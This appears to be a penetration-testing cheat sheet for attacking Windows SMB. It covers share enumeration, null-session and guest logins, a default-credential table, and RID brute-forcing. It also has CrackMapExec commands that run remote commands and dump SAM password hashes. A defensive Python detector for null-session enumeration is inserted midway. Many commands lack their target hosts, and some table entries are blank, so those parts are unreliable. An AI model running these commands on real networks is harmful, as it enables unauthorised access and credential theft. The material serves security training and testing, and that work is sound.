• Server Message Block (SMB) is a client-server protocol that regulates access to files, directories, and other network resources.

  • The SMB protocol enables a client to communicate with other participants on the same network and access the files or services shared with it.

  • An SMB server can provide arbitrary parts of its local file system as shares.

  • Access rights are defined by Access Control Lists (ACLs).

  • SMB runs on TCP port 445 by default.

SMB Shares Enumeration

  • Run Snaffler from a Windows host to find useful data in shares: .\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data

  • Run Scavenger from a Linux host to find useful data in shares: python3 ./ smb -t -u administrator -p Password123 -d testdomain.local

  • Shares enumeration from Windows: net view \\MachineName /all

  • CME Shares Enumeration from Linux: sudo crackmapexec smb -u validuser -p validpassword --shares

  • CME Share Spidering from Linux: sudo crackmapexec smb -u validuser -p validpassword -M spider_plus --share sharename

  • SMBMap Share Enumeration from Linux: smbmap -u validuser -p validpassword -d INLANEFREIGHT.LOCAL -H

  • SMBMap Share Recursive Directory Listing from Linux: smbmap -u validuser -p validpassword -d INLANEFREIGHT.LOCAL -H -R SHARENAME --dir-only

  • Download Shares Recursively from Linux: smbget -u guest -R smb://

SMB NULL Session, Guest and Common Credentials Authentication

  • Guest Authentication: enum4linux -a -u "guest" -p "" <DC IP>

  • Guest Authentication: smbmap -u "guest" -p "" -P 445 -H <DC IP>

  • Guest Authentication: smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //

  • NULL Session: smbclient -N -L //<FQDN/IP>

  • NULL Session: crackmapexec smb <FQDN/IP> --shares -u '' -p ''

  • NULL Session: smbmap -u "" -p "" -P 445 -H <DC IP>

  • NULL Session: enum4linux -a -u "" -p "" <DC IP>

  • Check for common SMB credentials, as listed below
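The defender's counterpart to the NULL session and guest checks above, as an added example that is not part of the original cheat sheet: a small detection over Windows Security events that flags a source which logs on as ANONYMOUS LOGON (event 4624, logon type 3) and then touches several shares (event 5140). The event IDs are real; the key=value line layout and the sample events are constructed for this example.

```python
"""Flag SMB null-session share enumeration from Windows Security events.

Event IDs are real (4624 = logon, 5140 = network share object accessed); the
key=value layout and the sample lines are constructed, not native EVTX/XML.
"""
import re
from collections import defaultdict

# Constructed sample: one anonymous session that walks several shares,
# and one normal authenticated user touching a single share.
SAMPLE_EVENTS = [
    "EventID=4624 LogonType=3 Account=ANONYMOUS LOGON Source=10.10.14.5",
    "EventID=5140 Account=ANONYMOUS LOGON Source=10.10.14.5 Share=\\\\*\\IPC$",
    "EventID=5140 Account=ANONYMOUS LOGON Source=10.10.14.5 Share=\\\\*\\Finance",
    "EventID=5140 Account=ANONYMOUS LOGON Source=10.10.14.5 Share=\\\\*\\HR",
    "EventID=5140 Account=ANONYMOUS LOGON Source=10.10.14.5 Share=\\\\*\\IT",
    "EventID=4624 LogonType=3 Account=jsmith Source=10.10.14.20",
    "EventID=5140 Account=jsmith Source=10.10.14.20 Share=\\\\*\\Finance",
]

# Values may contain spaces ("ANONYMOUS LOGON"), so a value runs until the
# next " Key=" boundary or the end of the line, not until the next space.
_FIELD = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_event(line):
    """Turn one 'Key=Value Key=Value' line into a dict."""
    return dict(_FIELD.findall(line.strip()))


def find_null_session_enumeration(events, share_threshold=3):
    """Return {source_ip: [shares]} for sources that authenticated as
    ANONYMOUS LOGON over the network and then accessed at least
    `share_threshold` distinct shares (IPC$ counts: it is the share a
    null session binds to before listing the others)."""
    anonymous_sources = set()
    shares_by_source = defaultdict(set)
    for raw in events:
        ev = parse_event(raw)
        if (ev.get("EventID") == "4624" and ev.get("LogonType") == "3"
                and ev.get("Account") == "ANONYMOUS LOGON"):
            anonymous_sources.add(ev["Source"])
        elif ev.get("EventID") == "5140" and ev.get("Source") in anonymous_sources:
            shares_by_source[ev["Source"]].add(ev["Share"])
    return {src: sorted(s) for src, s in shares_by_source.items()
            if len(s) >= share_threshold}


if __name__ == "__main__":
    for src, shares in find_null_session_enumeration(SAMPLE_EVENTS).items():
        print(f"possible null-session enumeration from {src}: {', '.join(shares)}")
```

On a real host the same logic applies to events exported from the Security log; 5140 requires the "Audit File Share" subcategory to be enabled.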

Common SMB Credentials

  Common Username(s)              Common Password
  Administrator, admin            (blank), password, administrator, admin
  (username missing from page)    arcserve, backup
  tivoli, tmersrvd                tivoli, tmersrvd, admin
  backupexec, backup              backupexec, backup, arcada
  test, lab, demo                 password, test, lab, demo

Enumerating SMB via RPC Client

The rpcclient utility offers many different queries that execute specific RPC functions on the SMB server to gather information.

  Command (Query)   Description
  (not on page)     Server information.
  (not on page)     Enumerate all domains that are deployed in the network.
  (not on page)     Provides domain, server, and user information of deployed domains.
  (not on page)     Enumerates all available shares.
  (not on page)     Provides information about a specific share.
  (not on page)     Enumerates all domain users.
  (not on page)     Provides information about a specific user.

Brute-forcing user RIDs:

  • Oneliner: for i in $(seq 500 1100);do rpcclient -N -U "" -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

  • Impacket Samrdump:

CrackMapExec (CME) Utilities

  • Run commands with CrackMapExec: crackmapexec smb -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

  • Enumerate logged-on users with CrackMapExec: crackmapexec smb -u administrator -p 'Password123!' --loggedon-users

  • Extract hashes from the SAM database with CrackMapExec: crackmapexec smb -u administrator -p 'Password123!' --sam

  • Enumerate password policies: crackmapexec smb -u validuser -p validpass --pass-pol